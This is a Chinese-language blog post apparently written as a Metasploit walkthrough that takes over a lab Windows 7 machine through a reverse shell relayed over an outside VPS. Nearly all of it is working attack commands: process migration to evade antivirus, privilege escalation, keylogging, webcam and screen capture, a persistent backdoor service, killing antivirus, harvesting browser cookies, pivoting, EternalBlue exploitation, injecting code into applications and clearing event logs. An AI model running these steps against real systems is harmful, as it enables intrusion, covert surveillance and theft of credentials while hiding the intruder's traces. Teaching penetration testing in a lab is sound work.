TimeS0ng

No results found

ur10ser's blog 大神浪子燕青

专注技术，乐于分享

Metasploit

0x00. Metasploit Framework简介

Metasploit是目前最流行、最强大、最具扩展性的渗透测试平台软件，是笔者最崇拜也最喜欢的工具没有之一，下面我将用msf给大家带来一场盛大的内网渗透体验，别眨眼噢！

0x01. 实战操作

环境准备：

1. 靶机win 7 IP=192.168.43.150

2. kali linux IP=192.168.43.153

3. VPS服务器 IP=xx.xx.xx.xx

实战演示：

1. 先用evil-evasion生成具有一定免杀功能的windows木马，监听地址设成VPS的地址（打码防D），然后将VPS上的2333端口映射到内网kali的2333端口，同时还要修改VPS上的ssh配置，不然别人是连不上VPS的（在实战中自己常常在内网，所以这里介绍一下VPS）

vi /etc/ssh/sshd_config && GatewayPorts:yes

ssh -CfNg -R xx.xx.xx.xx:2333:192.168.43.153:2333 root@xx.xx.xx.xx -p 29402

2. 启动kali设置msf监听，lport=2333，lhost=192.168.43.153(注意：这里的监听地址是kali的地址，不是VPS的），关于msf的基本操作网上有很多，这里不过多介绍，大家可以参考这个系列文章

[*]如果想要在docker启动持续监听可以用如下命令

set exitonsession false && run -j

3. 在win 7 中执行木马

4. 接收到meterpreter之后就应该将自己的进程迁移到一个隐蔽的进程中去，防止被查杀，这里笔者迁移到win 7的桌面进程

migrate 1988 && getpid

5. 查看当前权限、系统信息，并尝试提权

getuid && sysinfo && getsystem

6. 查看网络、路由信息

ifconfig && route

7. 监视靶机的桌面

run vnc

8. 启动键盘监听

keyscan_start && keyscan_dump

9. 设置后门，维持权限

run metsvc -A
use exploit/multi/handler
set payload windows/metsvc_bind_tcp

10. 截屏查看靶机当前桌面

screenshot

11. 查看当前系统空闲时间

idletime

12. 禁用靶机使用键盘鼠标（笔者win 7系统是64位的，不支持这个操作）

uictl disable keyboard

uictl disable mouse

13. 查找靶机中重要的敏感文件

search -d c:\\ -f payload.exe

14. 指定下载靶机中的文件到本地

dowmload c:\\Users\\root\\Desktop\\payload.exe /root/Desktop

15. 上传指定本地文件到靶机中

upload /root/Desktop/hack.jpeg c:\\Users\\root\\Desktop\\payload.exe

16. 打开靶机摄像头，win 7虚拟机没有摄像头所以没反应

webcam_snap

17. 将靶机3389端口映射到本地3344，这样连接本地3344端口就能连接靶机的远程桌面

portfwd add -l 3344 -p 3389 -r 127.0.0.1

0x02. 后渗透测试

1. 调用post模块查看当前系统可用的提权模块

run post/multi/recon/local_exploit_suggester

2. 调用payload模块对靶机进行远程桌面操作

set payload windows/vncinject/reverse_tcp

set viewonly no

3. 关掉靶机中的杀软

killav

run post/windows/gather/enum_ie

5. 设置路由转发，扫描内网机器开放的端口(route add 靶机IP 子网掩码 sessions)

route add 92.168.43.150 255.255.255.0 3

use auxiliary/scanner/portscan/tcp

6. 扫描一波内网有没有ms17_010漏洞的主机

use auxiliary/scanner/smb/smb_ms17_010

7. 笔者扫到win 7就有这个漏洞，然后就愉快的调用exp搞一波

use exploit/windows/smb/ms17_010_eternalblue

8.在靶机的指定应用中注入恶意代码

use post/windows/manage/peinjector

9. 功成身退

clearev

0x03. 结语
msf是真的强大，笔者总结的这些也只算是九牛一毛，大家在平时使用时多总结一定能玩出花儿来！

本文标题:Metasploit

文章作者:TimeS0ng

发布时间:2017-10-08, 23:21:39

最后更新:2018-12-18, 23:30:21

原始链接:http://TimeS0ng.github.io/2017/10/08/Metasploit/

许可协议: "署名-非商用-相同方式共享 4.0" 转载请保留原文链接及作者。

文章目录

1. 0x00. Metasploit Framework简介
1. 1.0.1. Metasploit是目前最流行、最强大、最具扩展性的渗透测试平台软件，是笔者最崇拜也最喜欢的工具没有之一，下面我将用msf给大家带来一场盛大的内网渗透体验，别眨眼噢！

2. 0x01. 实战操作

3. 环境准备：

3.0.1. 1. 靶机win 7 IP=192.168.43.150
3.0.2. 2. kali linux IP=192.168.43.153
3.0.3. 3. VPS服务器 IP=xx.xx.xx.xx

4. 实战演示：

4.1. 1. 先用evil-evasion生成具有一定免杀功能的windows木马，监听地址设成VPS的地址（打码防D），然后将VPS上的2333端口映射到内网kali的2333端口，同时还要修改VPS上的ssh配置，不然别人是连不上VPS的（在实战中自己常常在内网，所以这里介绍一下VPS）
4.2. 2. 启动kali设置msf监听，lport=2333，lhost=192.168.43.153(注意：这里的监听地址是kali的地址，不是VPS的），关于msf的基本操作网上有很多，这里不过多介绍，大家可以参考这个系列文章
4.3. 3. 在win 7 中执行木马
4.4. 4. 接收到meterpreter之后就应该将自己的进程迁移到一个隐蔽的进程中去，防止被查杀，这里笔者迁移到win 7的桌面进程
4.5. 5. 查看当前权限、系统信息，并尝试提权
4.6. 6. 查看网络、路由信息
4.7. 7. 监视靶机的桌面
4.8. 8. 启动键盘监听
4.9. 9. 设置后门，维持权限
4.10. 10. 截屏查看靶机当前桌面
4.11. 11. 查看当前系统空闲时间
4.12. 12. 禁用靶机使用键盘鼠标（笔者win 7系统是64位的，不支持这个操作）
4.13. 13. 查找靶机中重要的敏感文件
4.14. 14. 指定下载靶机中的文件到本地
4.15. 15. 上传指定本地文件到靶机中
4.16. 16. 打开靶机摄像头，win 7虚拟机没有摄像头所以没反应
4.17. 17. 将靶机3389端口映射到本地3344，这样连接本地3344端口就能连接靶机的远程桌面

0x02. 后渗透测试

0.1. 1. 调用post模块查看当前系统可用的提权模块
0.2. 2. 调用payload模块对靶机进行远程桌面操作
0.3. 3. 关掉靶机中的杀软
0.4. 4. 收集靶机浏览器的敏感信息(访问记录、cookie)
0.5. 5. 设置路由转发，扫描内网机器开放的端口(route add 靶机IP 子网掩码 sessions)
0.6. 6. 扫描一波内网有没有ms17_010漏洞的主机
0.7. 7. 笔者扫到win 7就有这个漏洞，然后就愉快的调用exp搞一波
0.8. 8.在靶机的指定应用中注入恶意代码
0.9. 9. 功成身退

1. 0x03. 结语

1.0.1. msf是真的强大，笔者总结的这些也只算是九牛一毛，大家在平时使用时多总结一定能玩出花儿来！